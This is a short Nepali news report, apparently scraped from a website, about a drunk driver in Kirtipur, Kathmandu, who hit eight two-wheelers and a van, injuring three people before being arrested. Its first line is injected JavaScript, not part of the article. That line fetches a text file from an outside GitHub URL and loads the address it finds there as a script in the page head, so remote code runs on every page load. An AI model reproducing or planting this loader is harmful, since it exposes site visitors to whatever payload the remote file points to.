;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन १५,
काठमाडौं । राजधानीस्थित् कीर्तिपुरमा एउटा कारले नौवाट सवारी साधानलाई ठक्कर दिएको छ । २ वटा स्कुटर, ६ वटा मोटरसाइकल र एउटा भ्यानलाई ठक्कर दिएको हो । ठक्कर दिने कारका चालकले मादक पदार्थ सेवन गरेको खुलेको छ ।
गएराति करिब ८:३० बजे कीर्तिपुरको नयाँ बजारमा सो सडक दुर्घटना भएको हो । महानगरीय प्रहरी वृत्त, कीर्तिपुरका डिएसपी रूपेश तण्डुकारका अनुसार एकतर्फी (वन वे) सडकबाट आएको कारले २ पाङ्ग्रे आठ वटा सवारीसाधन र एक भ्यानलाई ठक्कर दिएको हो । दुर्घटनामा ३ जना घाइते भएका डीएसपी तण्डुकारले जानकारी दिए।
घाइतेको अहिले कीर्तिपुर अस्पतालमा उपचार भइरहेको छ। दुर्घटना गराएका कारचालक चालक भागेका थिए। तर, प्रहरीले उनलाई कलंकीबाट पक्राउ गरेको छ।file Photo
फेसबुक प्रतिक्रियाहरु